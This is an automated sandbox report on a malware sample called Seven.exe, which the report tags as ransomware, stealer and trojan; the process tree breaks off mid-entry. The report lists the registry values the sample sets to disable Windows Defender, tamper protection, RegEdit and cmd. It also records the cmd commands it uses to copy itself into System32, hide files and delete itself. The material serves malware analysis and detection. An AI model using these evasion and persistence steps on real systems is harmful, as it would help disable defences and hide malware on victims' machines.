5104b1b7985c530313751401ea69dbf9d8154f197d7c4af534ce8605beeb33b1

Analysis

max time kernel
138s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
30/04/2024, 01:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Seven.exe
Size

139KB
MD5

350273e0d2e8a9ba5e37b791016112a0
SHA1

5bfb616dd46f67d1dcbbff55ca5917ffc1ec8b71
SHA256

27297bf8139bea755e9297e7e1489d827d1ee09a8e1d94a3ef96a2edb2de61ba
SHA512

b1e768524b4e840bd5f4163205122dd1725583245d8bfd5cbd89eb21a5fb9d33aff1b7b0ca42132b7dae469e025068ae663b3b02ad59927a558dc340141ec91b
SSDEEP

3072:miS4omp03WQthI/9S3BZi08iRQ1G78IVn27bSfcJd8ltw:miS4ompB9S3BZi0a1G78IVhcTct

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Seven.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Seven.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Seven.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Seven.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua = "1"	Seven.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "1"	Seven.exe

Blocks application from running via registry modification 1 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Seven.exe

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Seven.exe

Disables Task Manager via registry modification
evasion

Disables cmd.exe use via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	Seven.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Seven.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Winhost.exe

Deletes itself 1 IoCs

pid	Process
2920	Winhost.exe

Executes dropped EXE 64 IoCs

pid	Process
2920	Winhost.exe
8756	Winhost.exe
18576	Winhost.exe
17812	Winhost.exe
18232	Winhost.exe
17504	Winhost.exe
13912	Winhost.exe
2692	Winhost.exe
14200	Winhost.exe
17800	Winhost.exe
14224	Winhost.exe
12400	Winhost.exe
5272	Winhost.exe
10284	Winhost.exe
4748	Winhost.exe
1368	Winhost.exe
2552	Winhost.exe
2396	Winhost.exe
4308	Winhost.exe
3144	Winhost.exe
3832	Winhost.exe
1416	Winhost.exe
16468	Winhost.exe
14948	Winhost.exe
15104	Winhost.exe
15604	Winhost.exe
15644	Winhost.exe
15448	Winhost.exe
16504	Winhost.exe
17028	Winhost.exe
2912	Winhost.exe
15944	Winhost.exe
16224	Winhost.exe
17100	Winhost.exe
15980	Winhost.exe
15844	Winhost.exe
15224	Winhost.exe
14692	Winhost.exe
15504	Winhost.exe
16932	Winhost.exe
16272	Winhost.exe
14832	Winhost.exe
14400	Winhost.exe
15500	Winhost.exe
15432	Winhost.exe
18292	Winhost.exe
7032	Winhost.exe
12520	Winhost.exe
11656	Winhost.exe
5704	Winhost.exe
7672	Winhost.exe
8056	Winhost.exe
11192	Winhost.exe
11084	Winhost.exe
9068	Winhost.exe
5508	Winhost.exe
13280	Winhost.exe
13012	Winhost.exe
12292	Winhost.exe
7512	Winhost.exe
5484	Winhost.exe
10036	Winhost.exe
5828	Winhost.exe
7964	Winhost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	Seven.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua	Seven.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua = "1"	Seven.exe

Drops desktop.ini file(s) 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	Winhost.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	Winhost.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	Winhost.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	Winhost.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	Winhost.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	Winhost.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	Winhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File opened for modification	C:\Windows\System32\Seven.runtimeconfig.json	cmd.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File opened for modification	C:\Windows\System32\Winhost.exe	attrib.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File opened for modification	C:\Windows\System32\Winhost.exe	cmd.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\System32\Seven.runtimeconfig.json	cmd.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File opened for modification	C:\Windows\System32\Seven.dll	attrib.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\KeyAndIV.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe
File created	C:\Windows\system32\EncryptedLog.txt	Winhost.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp11subu.tmp.jpg"	Seven.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3776	powershell.exe
3776	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3776	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4976 wrote to memory of 3776	4976	Seven.exe	85
PID 4976 wrote to memory of 3776	4976	Seven.exe	85
PID 4976 wrote to memory of 3012	4976	Seven.exe	87
PID 4976 wrote to memory of 3012	4976	Seven.exe	87
PID 4976 wrote to memory of 3236	4976	Seven.exe	88
PID 4976 wrote to memory of 3236	4976	Seven.exe	88
PID 4976 wrote to memory of 4100	4976	Seven.exe	89
PID 4976 wrote to memory of 4100	4976	Seven.exe	89
PID 4976 wrote to memory of 2196	4976	Seven.exe	90
PID 4976 wrote to memory of 2196	4976	Seven.exe	90
PID 4976 wrote to memory of 5052	4976	Seven.exe	91
PID 4976 wrote to memory of 5052	4976	Seven.exe	91
PID 4976 wrote to memory of 3260	4976	Seven.exe	92
PID 4976 wrote to memory of 3260	4976	Seven.exe	92
PID 4976 wrote to memory of 1112	4976	Seven.exe	93
PID 4976 wrote to memory of 1112	4976	Seven.exe	93
PID 4976 wrote to memory of 1852	4976	Seven.exe	94
PID 4976 wrote to memory of 1852	4976	Seven.exe	94
PID 4976 wrote to memory of 2260	4976	Seven.exe	95
PID 4976 wrote to memory of 2260	4976	Seven.exe	95
PID 4976 wrote to memory of 4348	4976	Seven.exe	96
PID 4976 wrote to memory of 4348	4976	Seven.exe	96
PID 4976 wrote to memory of 1564	4976	Seven.exe	97
PID 4976 wrote to memory of 1564	4976	Seven.exe	97
PID 4976 wrote to memory of 4712	4976	Seven.exe	98
PID 4976 wrote to memory of 4712	4976	Seven.exe	98
PID 4976 wrote to memory of 2020	4976	Seven.exe	99
PID 4976 wrote to memory of 2020	4976	Seven.exe	99
PID 4976 wrote to memory of 3152	4976	Seven.exe	100
PID 4976 wrote to memory of 3152	4976	Seven.exe	100
PID 1564 wrote to memory of 1196	1564	cmd.exe	101
PID 1564 wrote to memory of 1196	1564	cmd.exe	101
PID 5052 wrote to memory of 4332	5052	cmd.exe	102
PID 5052 wrote to memory of 4332	5052	cmd.exe	102
PID 2020 wrote to memory of 4932	2020	cmd.exe	103
PID 2020 wrote to memory of 4932	2020	cmd.exe	103
PID 3152 wrote to memory of 2920	3152	cmd.exe	104
PID 3152 wrote to memory of 2920	3152	cmd.exe	104
PID 4348 wrote to memory of 4180	4348	cmd.exe	105
PID 4348 wrote to memory of 4180	4348	cmd.exe	105
PID 2196 wrote to memory of 4164	2196	cmd.exe	106
PID 2196 wrote to memory of 4164	2196	cmd.exe	106
PID 4712 wrote to memory of 4108	4712	cmd.exe	107
PID 4712 wrote to memory of 4108	4712	cmd.exe	107
PID 2920 wrote to memory of 4756	2920	Winhost.exe	109
PID 2920 wrote to memory of 4756	2920	Winhost.exe	109
PID 2920 wrote to memory of 3216	2920	Winhost.exe	110
PID 2920 wrote to memory of 3216	2920	Winhost.exe	110
PID 2920 wrote to memory of 1316	2920	Winhost.exe	113
PID 2920 wrote to memory of 1316	2920	Winhost.exe	113
PID 2920 wrote to memory of 884	2920	Winhost.exe	114
PID 2920 wrote to memory of 884	2920	Winhost.exe	114
PID 2920 wrote to memory of 4556	2920	Winhost.exe	116
PID 2920 wrote to memory of 4556	2920	Winhost.exe	116
PID 2920 wrote to memory of 756	2920	Winhost.exe	749
PID 2920 wrote to memory of 756	2920	Winhost.exe	749
PID 2920 wrote to memory of 4024	2920	Winhost.exe	767
PID 2920 wrote to memory of 4024	2920	Winhost.exe	767
PID 2920 wrote to memory of 1212	2920	Winhost.exe	120
PID 2920 wrote to memory of 1212	2920	Winhost.exe	120
PID 2920 wrote to memory of 3604	2920	Winhost.exe	122
PID 2920 wrote to memory of 3604	2920	Winhost.exe	122
PID 2920 wrote to memory of 3512	2920	Winhost.exe	124
PID 2920 wrote to memory of 3512	2920	Winhost.exe	124

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Seven.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "1"	Seven.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua = "1"	Seven.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4180	attrib.exe
1196	attrib.exe
4332	attrib.exe
4932	attrib.exe
4108	attrib.exe
4164	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Seven.exe
"C:\Users\Admin\AppData\Local\Temp\Seven.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Disables RegEdit via registry modification
- Disables cmd.exe use via registry modification
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3776
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.exe C:\Users\Admin\AppData\Local\Temp\Winhost.exe
  2⤵
  PID:3012
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.exe C:\Windows\System32\Winhost.exe
  2⤵
  - Drops file in System32 directory
  PID:3236
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.exe C:\Users\Public\Documents\Winhost.exe
  2⤵
  PID:4100
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C attrib +h C:\Windows\System32\Winhost.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Windows\system32\attrib.exe
    attrib +h C:\Windows\System32\Winhost.exe
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:4164
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C attrib +h C:\Users\Public\Documents\Winhost.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5052
- - C:\Windows\system32\attrib.exe
    attrib +h C:\Users\Public\Documents\Winhost.exe
    3⤵
    - Views/modifies file attributes
    PID:4332
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.dll C:\Windows\System32\Seven.dll
  2⤵
  PID:3260
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.dll C:\Users\Public\Documents\Seven.dll
  2⤵
  PID:1112
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.runtimeconfig.json C:\Windows\System32\Seven.runtimeconfig.json
  2⤵
  - Drops file in System32 directory
  PID:1852
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.runtimeconfig.json C:\Users\Public\Documents\Seven.runtimeconfig.json
  2⤵
  PID:2260
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C attrib +h C:\Windows\System32\Seven.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4348
- - C:\Windows\system32\attrib.exe
    attrib +h C:\Windows\System32\Seven.dll
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:4180
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C attrib +h C:\Windows\System32\Seven.runtimeconfig.json
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\system32\attrib.exe
    attrib +h C:\Windows\System32\Seven.runtimeconfig.json
    3⤵
    - Views/modifies file attributes
    PID:1196
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C attrib +h C:\Users\Public\Documents\Seven.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4712
- - C:\Windows\system32\attrib.exe
    attrib +h C:\Users\Public\Documents\Seven.dll
    3⤵
    - Views/modifies file attributes
    PID:4108
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C attrib +h C:\Users\Public\Documents\Seven.runtimeconfig.json
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\system32\attrib.exe
    attrib +h C:\Users\Public\Documents\Seven.runtimeconfig.json
    3⤵
    - Views/modifies file attributes
    PID:4932
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C start C:\Users\Admin\AppData\Local\Temp\Winhost.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3152
- - C:\Users\Admin\AppData\Local\Temp\Winhost.exe
    C:\Users\Admin\AppData\Local\Temp\Winhost.exe
    3⤵
    - Checks computer location settings
    - Deletes itself
    - Executes dropped EXE
    - Drops desktop.ini file(s)
    - Suspicious use of WriteProcessMemory
    PID:2920
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x64.log-MSI_vc_red.msi.txt"
      4⤵
      PID:4756
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:736
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x64.log.html"
      4⤵
      PID:3216
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:5028
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x86.log-MSI_vc_red.msi.txt"
      4⤵
      PID:1316
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3592
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x86.log.html"
      4⤵
      PID:884
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3788
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log"
      4⤵
